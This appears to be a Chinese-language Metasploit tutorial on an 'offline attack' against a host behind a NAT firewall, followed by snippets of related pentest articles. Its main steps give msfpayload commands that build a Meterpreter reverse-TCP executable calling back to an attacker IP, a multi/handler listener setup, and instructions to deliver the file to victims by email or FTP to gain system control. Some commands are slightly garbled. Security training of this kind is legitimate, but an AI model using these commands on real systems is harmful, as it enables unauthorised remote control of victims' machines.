MSF 离线攻击

MSF 离线攻击

MSF连环攻击在internet上实现是不太现实的,网络中的安全设备(防火墙、入侵检测、入侵防护系统)。

实验拓扑如下:

实验说明:安全实验中的包过滤防火墙在测试中使用的是linux iptables,上述拓扑中,攻击者的公网地址为61.67.1.100/24,而防火墙上的公网地址61.67.1.200/24 对内部主机192.168.1.0/24 做SNAT。

Linux iptables 策略如下:

#bin/bash

Fw=/sbin/iptables

$fw –P INPUT DROP

$fw –P FORWARD ACCEPT
$fw –P OUTPUT ACCEPT

echo 1
>/proc/sys/net/ipv4/ip_forward

$FW -t
nat -A POSTROUTING -o em1 -s 192.168.1.0/24 -j SNAT -to 61.67.1.200

Iptables-save

此时攻击者就无法主动发起TCP建立请求和位于防火墙后的服务器192.168.1.100/24建立连接,MSF连环攻击也就无法实现。因而在这种环境中需要使用MSF的离线攻击。

实现MSF离线攻击的步骤如下:

1、 
生成离线攻击脚本

#cd  /pentest/exploits/frameworks3

/pentest/exploits/frameworks3# ./msfpayload  windows/meterpreter/reverse_tcp
LHOST=10.0.0.3 LPORT=38438  X>/home/soft/msf38438.exe

说明:生成反向tcp连接脚本 服务器的IP为10.0.0.3
服务器使用的TCP端口为38438 生成的脚本存放的路径为/home/soft,文件名为 msf38438.exe

2、 
创建TCP反向连接服务

#msfconsole

msf>use exploit/multi/handler

msf exploit(handler)>set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler)>set LHOST 10.0.0.3

msf exploit(handler)>set PORT 38438

3、 启动服务

4、 
将生成的离线攻击包通过其他手段(邮件、FTP)等传送到受害者服务器,如下:

只要受害者服务器上该程序被执行即可。

5、 
在攻击者的服务器端查看连接

6、 
查看是否获取系统控制权

时间: 2024-11-03 21:36:04

MSF 离线攻击的相关文章

MSF基础攻击实践报告

MSF基础攻击实践 MSF的六个模块:exploit,encoder,payload,aux,post,nops exploit——渗透攻击模块 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果.常见的有内存溢出,网站程序漏洞利用,配置错误exploit. exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出.主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针 对目标主机被动的监听然后获得相应的操作. Exploit共分为

利用MSF的MS08_067模块攻击windows server 2003 SP2中文版系统

一.测试环境 攻击机:kali(NMAP+MSF) 靶机:windows server 2003 SP2 中文版 利用漏洞:MS08_067 二.漏洞描述 MS08-067漏洞的全称为"Windows Server服务RPC请求缓冲区溢出漏洞",如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码,可用于进行蠕虫攻击.受影响的系统有 Microsoft Windows 2000.Windows XP 和 Windows Server 2003 . 三.目标渗透

MSF连续攻击实验

MSF连续攻击实验 一.实验拓扑 二.实验环境 Windows XP BT 5 32位 三.实验原理 通过扫描 XP主机,利用扫描出的漏洞建立 TCP会话,通过进程的提权,进一步获取目标机的控制权限 四.实验目的 掌握MSF连续攻击的原理和利用MSF攻击检测技术进行服务器漏洞的查找 五.实验步骤 1.  扫描目标主机的开放端口和操作指纹等信息 >db_nmap  -SV –n –v 10.0.0.6 2.扫描结果如下 2.  发起MSF自动攻击 >db_autopwn –p  -t  -e 3

如何对Windows系统进行哈希传递攻击(Pass-Hash-Attack)

『面向对象』本篇博文主要面向信息安全渗透测试初级人员以及信息安全攻防技术爱好者. 『主要内容』主要介绍在后渗透测试阶段如何对Windows操作系统进行哈希传递攻击(Hash-Pass-Attack). -------------------------------------------菜鸟起飞系列------------------------------------------------ 渗透测试任务:利用Hash-Pass-Attack获取Windows操作系统控制权 攻击测试目标:wi

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 payload:generic/shell_bind_tcp(成功且唯一) ms17_010_eternalblue:"永恒之蓝"自动化攻击 payload:windows/x64/shell/reverse_tcp_uuid(成功且唯一) 攻击浏览器的实践 ms10_046

2018-2019-2 20165234 《网络对抗技术》Exp5 MSF基础应用

实验四 恶意代码分析 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器的攻击,ms11_050(成功) 3. 一个针对客户端的攻击,Adobe(成功) 4. 成功应用任何一个辅助模块,scanner/ssh/ssh_version,(成功,唯一) 基础问题 用自己的话解释什么是exploit,payload,encode: Exploit:exploit 的英文意思为利

backtrack工具菜完整解析

Information Gathering - 信息收集             NetWork Analysis - 网络分析             Dns Analysis - dns分析             Identify Live Hosts - 存活主机识别             IDS IPS Identification - IDS IPS识别             Network Scanners - 网络扫描             Network Traffic

Back Track5学习笔记

1.BT5默认用户名:root.密码:toor(公司是yeslabccies) 2.进入图形化界面命令:startx 3.更改密码:sudo passwd root 扫描工具 第一部分网络配置: 4.网络配置文件有两个: /etc/network/interfaces 和 /etc/resolv.conf 前一个存放网卡接口.IP.子网掩码等,后一个主要是存放DNS. 5.查看IP信息:ifconfig 6.更改IP :ifconfig eth2 192.168.8.168 netmask 25

Kali Linux 学习

一.kali 安全渗透的一般测试 流程 1.信息收集 目标在线主机,域名信息,邮箱地址,常用密码,同网段信息,子域名信息,指纹信息,端口信息 2.漏洞分析 cisco工具集(cisoco工具) fuzzing工具集 openvas 开源评估软件 扫描工具集 数据库评估软件 3.漏洞利用 4.权限维持(创建一个后门) 5.文档编辑 二.谷歌黑客(goole hacker) 1.通过互联网 searchdns.netcraft.com DNS查询 shodaning.com大数据 http://ww